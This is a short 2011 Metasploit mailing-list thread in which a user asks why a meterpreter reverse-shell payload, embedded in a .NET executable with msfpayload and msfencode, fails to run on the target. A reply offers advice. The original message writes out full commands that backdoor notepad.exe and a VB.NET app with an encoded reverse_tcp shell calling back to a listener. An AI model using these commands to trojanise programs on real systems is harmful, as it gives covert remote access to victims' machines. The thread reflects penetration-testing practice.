Metasploit mailing list archives
Re: attaching meterpreter to a managed code binary
From: Jeremy <jeremy () sudosecure net>
Date: Mon, 25 Jul 2011 19:35:59 -0500
Nope I think I figured out where my brain fart was... It is bytecode vs true binary. --jeremy On Mon, Jul 25, 2011 at 2:39 PM, Scott McClellan <Scott.McClellan () tn gov> wrote:
Your syntax looks good to me. Have you tried another payload, maybe just a command shell? I haven't done much with the .NET Framework, but have run into instances where mixing managed & unmanaged code causes problems. Could be that the relative complexity of meterpreter gives the .NET Framework heartburn. Date: Mon, 25 Jul 2011 11:54:57 -0500 From: Jeremy <jeremy () sudosecure net> To: framework () spool metasploit com Subject: [framework] Attaching Meterpreter to a Managed Code Binary like a VB.NET or C#.NET app? Message-ID: <CABXVT3BpqK4G=XCSLzh_ikan5NxRyb5gUw9JMt4N5HUh5G_zDA () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 Anyone ever try attaching a meterpreter backdoor payload to a managed code binary generated from something like VB.net? ?I can attach meterpreter to a native binary like this all day long: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=80 R | msfencode -x notepad.exe -k -o notepad_new.exe -e x86/shikata_ga_nai -c 10 -t exe But lets say the managed code .NET app is called "vbapp.exe" I try this command: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=80 R | msfencode -x vbapp.exe -k -o vbapp_new.exe -e x86/shikata_ga_nai -c 10 -t exe and it fails to execute on the victim machine. ?It raises an exemption with "The application failed to initialize properly. (0xc000007b). Click ok to terminate the application." Anyways thought I would ask before I started stepping through the process just in case someone spotted a issue with my syntax or has done this before and has a work around. ?;) Thanks in advance for any advice and/or help. --jeremy _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: attaching meterpreter to a managed code binary Scott McClellan (Jul 25)
- Re: attaching meterpreter to a managed code binary Jeremy (Jul 25)